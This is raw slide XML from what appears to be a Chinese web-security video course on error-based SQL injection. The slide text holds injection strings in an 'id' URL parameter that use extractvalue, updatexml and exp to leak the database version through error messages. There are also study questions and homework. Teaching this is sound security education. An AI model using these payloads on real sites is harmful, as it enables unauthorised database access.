              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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27" y="1503779"/>
            <a:ext cx="444500" cy="4445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AE60B3D-AE4F-F645-A12B-B086D2CE9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299" y="2165100"/>
            <a:ext cx="5130800" cy="13589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EAFDBF8-76AE-6345-9D8D-12EF8F90C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3299" y="3879929"/>
            <a:ext cx="53848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00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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数 </a:t>
            </a:r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extractvalue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E14782-4650-2440-AC41-0CF73AC29A3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56577" y="1559998"/>
            <a:ext cx="8379882" cy="4309162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>思考：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为什么要使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 函数呢？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty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kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 是什么？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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27" y="1503779"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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E808914E-0CA8-B54D-92F5-5492161524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56577" y="3429000"/>
            <a:ext cx="10035005" cy="189955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?id=1' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(0x7e, (select @@version)))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'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53993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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数 </a:t>
            </a:r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extractvalue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E14782-4650-2440-AC41-0CF73AC29A3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56577" y="1595624"/>
            <a:ext cx="8379882" cy="4309162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>思考：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为什么要使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 函数呢？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty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kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7e</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 是什么？</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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27" y="1503779"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3180685C-B383-A949-BCB5-00BBC3830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27" y="2845222"/>
            <a:ext cx="11022106" cy="328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16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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数 </a:t>
            </a:r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updatexml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73694E-6419-C940-91E6-3FBB1F0D9C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56995" y="4652448"/>
            <a:ext cx="10035005" cy="189955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/>
              <a:t>?id=2'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> and updatexml(1,concat(0x7e,(SELECT @@version)),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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27" y="1427845"/>
            <a:ext cx="444500" cy="444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BB6B32A-10BC-F44D-8F3F-E88F8C03D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116" y="2082887"/>
            <a:ext cx="6210300" cy="1346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CDE26E3-0AF3-8B4C-A715-7A855060F2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4116" y="3684067"/>
            <a:ext cx="6540500" cy="419100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2728333D-89E9-2F4E-8CF2-E7C5951B4DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1616871" y="1453245"/>
            <a:ext cx="5828957" cy="41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accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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200" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> payload </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>原理（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t> UPDATEXML </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="22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888152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4CD337-3BE7-0A4A-98DE-7AA8618CD6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048397" y="4476784"/>
            <a:ext cx="6095206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2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>扫码试看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>订阅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>《Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t> 安全攻防实战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:ea typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
                <a:cs typeface="Alibaba PuHuiTi Light" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>视频课程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BB5B18B-4632-5B46-8087-CF3F8F6B5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421" y="1473626"/>
            <a:ext cx="3003158" cy="300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35991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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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常见函数 </a:t>
            </a:r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E14782-4650-2440-AC41-0CF73AC29A3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16872" y="1516721"/>
            <a:ext cx="4945203" cy="355624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报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> payload </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原理（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> exp </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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73694E-6419-C940-91E6-3FBB1F0D9C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83727" y="4123150"/>
            <a:ext cx="10035005" cy="189955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/>
              <a:t>注意，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>exp()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 产生错误，但是并没有爆出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>database()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，但是发现 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是表达式，在脚本语言中会转化为相应的值，从而爆出数据库名。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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27" y="1427845"/>
            <a:ext cx="444500" cy="4445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6883764-D804-9740-A7A8-334F69E6E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00" y="3103200"/>
            <a:ext cx="11451600" cy="71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50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54C6A-2360-E048-97AF-936385A0C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3414" y="306601"/>
            <a:ext cx="7852933" cy="557723"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="x-none" sz="3200" dirty="0">
                <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              </a:rPr>
              <a:t>课后作业</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122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3BD0F8A-7223-6D4F-BDE2-67DD467D28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0" t="756" r="42434" b="17660"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481945" y="1117682"/>
            <a:ext cx="2786187" cy="5766697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62718D3-CDB0-ED43-920B-FCCA38F85DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481946" y="1117682"/>
            <a:ext cx="2786186" cy="579105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BE843B4-CE0B-5044-951B-F95D60E3C292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346480" y="2841544"/>
            <a:ext cx="3100612" cy="21641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6990F6B-0A9F-F143-99A8-8BF0649910C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349808" y="3726425"/>
            <a:ext cx="3100612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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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LET’S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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PRACTICE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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4F5D6C5-B877-8C42-9661-2954312D2E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122363"/>
            <a:ext cx="12192000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line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E8D7C7D-874B-3E46-BF54-19B86075F06E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5022731" y="3584198"/>
            <a:ext cx="6819461" cy="10516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对于拓展的错误注入函数进行原理分析。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搜索未介绍的报错注入函数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Freeform 1669">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{789BDFC4-93AC-5B46-AFDD-EF4D65AD18AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4289880" y="3690518"/>
            <a:ext cx="406648" cy="406648"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 519 w 719"/>
              <a:gd name="T1" fmla="*/ 263 h 719"/>
              <a:gd name="T2" fmla="*/ 292 w 719"/>
              <a:gd name="T3" fmla="*/ 475 h 719"/>
              <a:gd name="T4" fmla="*/ 289 w 719"/>
              <a:gd name="T5" fmla="*/ 477 h 719"/>
              <a:gd name="T6" fmla="*/ 284 w 719"/>
              <a:gd name="T7" fmla="*/ 479 h 719"/>
              <a:gd name="T8" fmla="*/ 280 w 719"/>
              <a:gd name="T9" fmla="*/ 477 h 719"/>
              <a:gd name="T10" fmla="*/ 275 w 719"/>
              <a:gd name="T11" fmla="*/ 475 h 719"/>
              <a:gd name="T12" fmla="*/ 200 w 719"/>
              <a:gd name="T13" fmla="*/ 400 h 719"/>
              <a:gd name="T14" fmla="*/ 198 w 719"/>
              <a:gd name="T15" fmla="*/ 396 h 719"/>
              <a:gd name="T16" fmla="*/ 197 w 719"/>
              <a:gd name="T17" fmla="*/ 391 h 719"/>
              <a:gd name="T18" fmla="*/ 198 w 719"/>
              <a:gd name="T19" fmla="*/ 387 h 719"/>
              <a:gd name="T20" fmla="*/ 200 w 719"/>
              <a:gd name="T21" fmla="*/ 382 h 719"/>
              <a:gd name="T22" fmla="*/ 205 w 719"/>
              <a:gd name="T23" fmla="*/ 380 h 719"/>
              <a:gd name="T24" fmla="*/ 209 w 719"/>
              <a:gd name="T25" fmla="*/ 379 h 719"/>
              <a:gd name="T26" fmla="*/ 213 w 719"/>
              <a:gd name="T27" fmla="*/ 380 h 719"/>
              <a:gd name="T28" fmla="*/ 217 w 719"/>
              <a:gd name="T29" fmla="*/ 382 h 719"/>
              <a:gd name="T30" fmla="*/ 284 w 719"/>
              <a:gd name="T31" fmla="*/ 450 h 719"/>
              <a:gd name="T32" fmla="*/ 503 w 719"/>
              <a:gd name="T33" fmla="*/ 247 h 719"/>
              <a:gd name="T34" fmla="*/ 507 w 719"/>
              <a:gd name="T35" fmla="*/ 243 h 719"/>
              <a:gd name="T36" fmla="*/ 512 w 719"/>
              <a:gd name="T37" fmla="*/ 243 h 719"/>
              <a:gd name="T38" fmla="*/ 516 w 719"/>
              <a:gd name="T39" fmla="*/ 243 h 719"/>
              <a:gd name="T40" fmla="*/ 519 w 719"/>
              <a:gd name="T41" fmla="*/ 247 h 719"/>
              <a:gd name="T42" fmla="*/ 522 w 719"/>
              <a:gd name="T43" fmla="*/ 251 h 719"/>
              <a:gd name="T44" fmla="*/ 523 w 719"/>
              <a:gd name="T45" fmla="*/ 255 h 719"/>
              <a:gd name="T46" fmla="*/ 522 w 719"/>
              <a:gd name="T47" fmla="*/ 260 h 719"/>
              <a:gd name="T48" fmla="*/ 519 w 719"/>
              <a:gd name="T49" fmla="*/ 263 h 719"/>
              <a:gd name="T50" fmla="*/ 707 w 719"/>
              <a:gd name="T51" fmla="*/ 0 h 719"/>
              <a:gd name="T52" fmla="*/ 12 w 719"/>
              <a:gd name="T53" fmla="*/ 0 h 719"/>
              <a:gd name="T54" fmla="*/ 8 w 719"/>
              <a:gd name="T55" fmla="*/ 2 h 719"/>
              <a:gd name="T56" fmla="*/ 4 w 719"/>
              <a:gd name="T57" fmla="*/ 5 h 719"/>
              <a:gd name="T58" fmla="*/ 1 w 719"/>
              <a:gd name="T59" fmla="*/ 8 h 719"/>
              <a:gd name="T60" fmla="*/ 0 w 719"/>
              <a:gd name="T61" fmla="*/ 13 h 719"/>
              <a:gd name="T62" fmla="*/ 0 w 719"/>
              <a:gd name="T63" fmla="*/ 707 h 719"/>
              <a:gd name="T64" fmla="*/ 1 w 719"/>
              <a:gd name="T65" fmla="*/ 713 h 719"/>
              <a:gd name="T66" fmla="*/ 4 w 719"/>
              <a:gd name="T67" fmla="*/ 716 h 719"/>
              <a:gd name="T68" fmla="*/ 8 w 719"/>
              <a:gd name="T69" fmla="*/ 719 h 719"/>
              <a:gd name="T70" fmla="*/ 12 w 719"/>
              <a:gd name="T71" fmla="*/ 719 h 719"/>
              <a:gd name="T72" fmla="*/ 707 w 719"/>
              <a:gd name="T73" fmla="*/ 719 h 719"/>
              <a:gd name="T74" fmla="*/ 711 w 719"/>
              <a:gd name="T75" fmla="*/ 719 h 719"/>
              <a:gd name="T76" fmla="*/ 716 w 719"/>
              <a:gd name="T77" fmla="*/ 716 h 719"/>
              <a:gd name="T78" fmla="*/ 718 w 719"/>
              <a:gd name="T79" fmla="*/ 713 h 719"/>
              <a:gd name="T80" fmla="*/ 719 w 719"/>
              <a:gd name="T81" fmla="*/ 707 h 719"/>
              <a:gd name="T82" fmla="*/ 719 w 719"/>
              <a:gd name="T83" fmla="*/ 13 h 719"/>
              <a:gd name="T84" fmla="*/ 718 w 719"/>
              <a:gd name="T85" fmla="*/ 8 h 719"/>
              <a:gd name="T86" fmla="*/ 716 w 719"/>
              <a:gd name="T87" fmla="*/ 5 h 719"/>
              <a:gd name="T88" fmla="*/ 711 w 719"/>
              <a:gd name="T89" fmla="*/ 2 h 719"/>
              <a:gd name="T90" fmla="*/ 707 w 719"/>
              <a:gd name="T91" fmla="*/ 0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19" h="719">
                <a:moveTo>
                  <a:pt x="519" y="263"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="280" y="477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275" y="475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="391"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213" y="380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284" y="450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="512" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="523" y="255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="519" y="263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4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4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8116627-3876-DF40-B3DF-797D7BBB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D723B5E-F49C-42B4-B84C-579B3F105F1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723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BEBA81A-14FB-D54F-BA16-63ABCB5701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实战</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2387257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98B054C-3C4B-E342-9089-843CF579E55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11284" y="1445088"/>
            <a:ext cx="11174274" cy="121790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docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
